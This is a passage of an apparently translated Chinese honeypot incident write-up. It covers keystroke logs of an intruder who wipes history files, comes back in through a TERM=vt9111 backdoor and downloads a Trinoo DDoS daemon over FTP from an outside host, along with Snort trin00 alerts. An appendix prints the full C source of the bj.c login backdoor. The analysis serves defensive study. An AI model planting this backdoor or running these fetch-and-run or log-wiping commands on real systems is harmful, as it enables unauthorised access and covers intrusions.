sbin/rpc.portmap ; rm -rf
rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.ba
359 ? 00:00:00 inetd
359 ? 00:00:00 inetd
rm: cannot remove `/tmp/h\: No such file or directory
rm: cannot remove `/usr/sbin/rpc.portmap\: No such file or directory
[root@apollo /]# ps -aux | grep portmap
[root@apollo /]# [root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ;
rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ;
rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por
rm: cannot remove `/sbin/portmap\: No such file or directory
rm: cannot remove `/tmp/h\: No such file or directory
rm: cannot remove `/usr/sbin/rpc.portmap\: No such file or directory
[root@apollo /]# rm: cannot remove `/sbin/portmap\: No such file or directory
这里发现了一个有趣的事情,这个攻击者使用的generic清理脚本在尝试删除不存在文件的时候产生了错误,我判断攻击者看到了这些信息并尝试了手工删除这些文件,经管这些文件不存在:
rm: cannot remove `/tmp/h\: No such file or directory
rm: cannot remove `/usr/sbin/rpc.portmap\: No such file or directory
[root@apollo /]# rm: cannot remove `/sbin/portmap\: No such file or directory
rm: cannot remove `/tmp/h\: No such file or directory
rm: cannot remove `/usr/sbin/rpc.portmap\: No such file or directory
[root@apollo /]# exit
exit
[twin@apollo /]$ exit
logout
到这里为止,他离开了系统,并安装了BJ.C后门,这个后门允许未认证的访问,只要把TERM设置为VT9111即可。后来,攻击者又多次进行了连接后修改系统。
返回后的活动,安装TRINOO
在系统被攻击后,我离线检查了系统上的数据,如使用Tripwire,后来,我注意到下一星期多个系统又尝试连接这台机器,很明显攻击者想再次回来,所以,我又把这台机器接上来INTERNET,很好奇想知道这个攻击者想在这机器上再做些什么事情,果然,两星期后,攻击者又回来了,我们再次记录了他的击键记录,检查了TELNET会话进程并知道怎样使我们的系统安装了TRINO 客户端程序:
在5月9号,10:45早上,攻击者从24.7.85.192 再次TELNET机器,注意其设置了VT9111不认证进入了系统:
!\"\ #\!\"# \ 9600,9600\VT9111VT9111
Red Hat Linux release 6.0 (Shedwig)
Kernel 2.2.5-15 on an i586
[root@apollo /]# ls
bin cdrom etc home lost+found proc sbin usr
boot dev floppy lib mnt root tmp var
在系统上,他想使用DNS,但是,这台机器上的DNS服务已经被破坏,因为DNS
被用来EXPLOIT获得ROOT权限,因此系统不能在解析域名了:
[root@apollo /]# nslookup magix
[root@apollo /]# nslookup irc.powersurf.com
Server: zeus-internal.uicmba.edu
Address: 172.16.1.101
攻击者在FTP系统到新加坡并下载了一些新的ROOTKIT工具,注意建立了一个.s的隐藏目录并存储了ROOTKIT工具:
[root@apollo /]# mkdir .s
[root@apollo /]# cd .s
[root@apollo /.s]# ftp nusnet-216-35.dynip.nus.edu.sg
ftp: nusnet-216-35.dynip.nus.edu.sg: Unknown host
ftp> qquituit
[root@apollo /.s]# ftpr 137.132.216.35
login: ftrp: command not found
[root@apollo /.s]#
[root@apollo /.s]# ftp 137.132.216.35
Connected to 137.132.216.35.
220 nusnet-216-35.dynip.nus.edu.sg FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999) ready.
他在那台机器上也使用了相同的用户名字:
Name (137.132.216.35:root): twin
331 Password required for twin.
Password:hax0r
230 User twin logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get d.tar.gz
local: d.tar.gz remote: d.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for d.tar.gz (8323 bytes).
150 Opening BINARY mode data connection for d.tar.gz (8323 bytes).
226 Transfer complete.
8323 bytes received in 1.36 secs (6 Kbytes/sec)
ftp> quit
221-You have transferred 8323 bytes in 1 files.
221-Total traffic for this session was 8770 bytes in 1 transfers.
221-Thank you for using the FTP service on nusnet-216-35.dynip.nus.edu.sg.
221 Goodbye.
[root@apollo /.s]# gunzip d*
[root@apollo /.s]# tar -xvf d*
daemon/
daemon/ns.c
daemon/ns
[root@apollo /.s]# rm -rf d.tar
[root@apollo /.s]# cd daemon
[root@apollo daemon]# chmod u+u+x nsx ns
[root@apollo daemon]# ./ns
攻击者安装和使用了Trinoo客户端,下一步他尝试跳到另一台机器,注意他又设置了不同的VT TERM,这次连接没有成功,因为DNS解析没有成功:
[root@apollo daemon]# TERM=vt1711
[root@apollo daemon]# telnet macau.hkg.com
macau.hkg.com: Unknown host
[root@apollo daemon]# exit
exit
这个朋友离开不久,并从其他系统上有返回来(137.132.216.35) :
!\"\ #\!\"# \ 9600,9600\VT9111VT9111
Red Hat Linux release 6.0 (Shedwig)
Kernel 2.2.5-15 on an i586
apollo /]# TERM=vt9111
telnet ns2.cpcc.cc.nc.us
ns2.cpcc.cc.nc.us: Unknown host
@apollo /}#telnet 1 152.43.29.52
Trying 152.43.29.52...
Connected to 152.43.29.52.
Escape character is \^]\.
!!!!!!Connection closed by foreign host.
te8ot@apollo /]# TERM=vt7877
[root@apollo /]# telnet sparky.w
itoot@apollo /]# exit
exit
根据下面的这些活动,可以知道其尝试使用TRINOO攻击其他系统,这个时候,我断开了系统的连接,攻击者企图使用控制的机器并想破坏其他系统的目的,可以通过监视系统的连接获得:
May 9 11:03:20 lisa snort[2370]: IDS/197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444
May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335
May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444
May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335
May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444
May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335
附录:1,有关怎样建立Honeypot请参看:http://www.enteract.com/~lspitz/honeypot.html
2,bj.c源程序代码:
#define _XOPEN_SOURCE
#include
#include
#include
#include
#include
#define SHELL \"/bin/sh\"
#define SHELL_CALLME \"login\"
#define LOGIN \"/usr/bin/xstat\"
#define LOGIN_CALLME \"login\"
#define ENV_NAME \"TERM\"
#define ENV_VALUE \"vt9111\"
#define ENV_FIX \"r!!t!d\"
int owned(void);
char **av, **ep;
int main(int argc, char **argv, char **envp) {
av=argv;
ep=envp;
av[0]=SHELL_CALLME;
if (owned()) {
char *sav[]={ SHELL_CALLME, NULL };
execve(SHELL, sav, ep);
return 0;
}
execve(LOGIN, av, ep);
return 0;
}
int owned(void) {
char *name, *value;
int i;
for (i=0; ep[i]!=NULL; ++i) {
name=strtok(ep[i], \"=\");
value=strtok(NULL, \"=\");
if (name==NULL || value==NULL) continue;
if (!strncmp(name, ENV_NAME, strlen(ENV_NAME))) {
if (!strncmp(value, ENV_VALUE, strlen(ENV_VALUE))) {
char tmp[100];
sprintf(tmp, \"%s=%s\", ENV_NAME, ENV_FIX);
ep[i]=strdup(tmp);
return 1;
}
}
}
return 0;
}
3,snort的相应网址:http://www.snort.org/
[email protected] 2000-05-25
http://www.netguard.com.cn